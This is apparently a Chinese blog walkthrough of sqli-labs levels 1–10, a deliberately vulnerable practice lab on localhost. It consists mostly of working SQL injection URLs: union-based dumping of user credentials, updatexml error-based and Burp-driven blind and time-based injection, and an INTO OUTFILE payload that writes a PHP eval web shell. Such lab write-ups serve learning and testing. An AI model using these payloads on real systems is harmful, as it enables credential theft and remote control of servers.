sql-lib 1-10关

注释符:'#' '-- ' '/**/'

#:%23
传输过程对单引号还有空格进行了url编码。原来是#号没了,为什么呢?因为url中的#号代表html页面中的锚点,数据传输过程并不会一起带到后端
在进行写入数据库文件的时候,路径中间为'/' 或者为 '\\'
为什么要使用双斜杠原因为:
由于我们是把路径当成是一个字符串传进去的,在字符串中斜杠“\”被当做转义字符识别,所以要用“\\”才能表示一个斜杠。

1.
字符型
http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败
http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功
http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23  查看所有数据库
http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'%23  查看security数据库下的所有表
http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23  查看表users的所有列
http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from security.users%23  查看表users的username和password数据

2.
判断整形
http://127.0.0.1:88/sql/Less-2/?id=1 order by 3 %23成功
http://127.0.0.1:88/sql/Less-2/?id=1 order by 4 %23不成功
http://127.0.0.1:88/sql/Less-2/?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata %23  查看所有数据库
http://127.0.0.1:88/sql/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'%23  查看数据库security下所有的表
http://127.0.0.1:88/sql/Less-2/?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23 查看所有的users表下的列 
http://127.0.0.1:88/sql/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users%23  查看所有的username,password数据

3.
http://127.0.0.1:88/sql/Less-3/?id=1')  %23
http://127.0.0.1:88/sql/Less-3/?id=1') order by 4 %23不成功
http://127.0.0.1:88/sql/Less-3/?id=1') order by 3 %23成功
http://127.0.0.1:88/sql/Less-3/?id=-1') union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
除了前面的闭合,其他的和上面一样

4.
http://127.0.0.1:88/sql/Less-4/?id=1") %23
http://127.0.0.1:88/sql/Less-4/?id=1") order by 4 %23 不成功
http://127.0.0.1:88/sql/Less-4/?id=1") order by 3 %23 成功
除了前面的闭合,其他的和上面一样

5.
加''进行闭合,或者直接' %23对后面进行省略,此外,无数据回显,进行盲注或者报错注入

报错注入:http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(database()) from information_schema.schemata)),1));  %23 查看所有数据库

http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1));  %23 查看数据库security下所有的表

http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1));  %23 查看所有的users表下的列 

http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(username) from security.users)),1));  %23 查看所有的username数据

http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(password) from security.users)),1));  %23 查看所有password数据

盲注:
http://127.0.0.1:88/sql/Less-5/?id=1' and length(database())=1 %23  用brup开始跑,最后数据库长度为8

http://127.0.0.1:88/sql/Less-5/?id=1' and ascii(substr(database(),1,1))='0' %23 开始跑brup,最后数据库名ascii为115 101 99 117 114 105 116 121 转换为security

http://127.0.0.1:88/sql/Less-5/?id=1' and (select count(*)from information_schema.tables where table_schema=database() )=4 %23  可以发现当前数据库下有4张表

http://127.0.0.1:88/sql/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='0' %23 跑出第一张表为emails,把后面的limit 1,1 一次次换,得到四张表

后来就和上面一样依次跑出表的字段,数据

6.
http://127.0.0.1:88/sql/Less-6/?id=1" %23 和上面的去区别是用双引号进行闭合
其他的步骤和上面类似


7.
http://127.0.0.1:88/sql/Less-7/?id=1')) %23 闭合
http://127.0.0.1:88/sql/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\web\\PhpStudy20180211\\PHPTutorial\\WWW\\a.php"--+  写入文件
http://127.0.0.1:88/sql/Less-7/?id=1')) union select 1,2,3 into outfile "D:/web/PhpStudy20180211/PHPTutorial/WWW/a.php"--+  写入文件

http://127.0.0.1:88/sql/Less-7/?id=1')) union select 1,"<?php @eval($_POST['cmd']); ?>",3 into outfile "D:/web/PhpStudy20180211/PHPTutorial/WWW/sql/a.php"--+ 写入一句话


8.
http://127.0.0.1:88/sql/Less-8/?id=1' %23 闭合
和第五个盲注过程一样,通过brup跑

9.
发现无回显,用报错或者时间盲注,但是测试报错注入也不行,只能用时间盲注
http://127.0.0.1:88/sql/Less-9/?id=1' and if(1=2,1,sleep(5)) %23  闭合
http://127.0.0.1:88/sql/Less-9/?id=1' and if(length(database())<1,sleep(10),1) %23   brup跑数字库长度,当到8时暂停了10秒
http://127.0.0.1:88/sql/Less-9/?id=1' and and if(ascii(substring(database(),1,1))='110',sleep(5),1) %23 跑assic码,跑出来是security
http://127.0.0.1:88/sql/Less-9/?id=1' and if((select count(*)from information_schema.tables where table_schema=database() )=4,sleep(5),1) %23  发现当前数据库下有4张表
下来就是和第5关的盲注一样了,只不过加上sleep函数进行判断对错

10.
http://127.0.0.1:88/sql/Less-10/?id=1" and if(1=2,1,sleep(5)) %23 闭合
http://127.0.0.1:88/sql/Less-10/?id=1" and if(length(database())<9,sleep(10),1) %23  判断出当前数据库名称为8位
下来就和第九关差不多了

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqllibs闯是一个SQL注入的平台,它提供了一系列的挑战和实践,让用户可以学习和测试SQL注入攻击的技术。通过在sqllibs闯中完成各种任务,用户可以提升他们对SQL注入的理解和技能。在这个平台上,用户可以使用各种工具和技术来尝试不同类型的SQL注入攻击,如基于错误的注入、联合查询注入等。用户可以通过检测和利用应用程序中的SQL注入漏洞来获取敏感信息或者执行任意的数据库操作。通过挑战和实践,用户可以提高他们对SQL注入攻击的防御意识,并学习如何编写安全的代码来防止这类攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [sql-lib课程第一课](https://blog.csdn.net/m0_37175113/article/details/105753588)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [sqli-libs(1-6)闯笔记(纯手注)](https://blog.csdn.net/qq_40671478/article/details/107968190)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值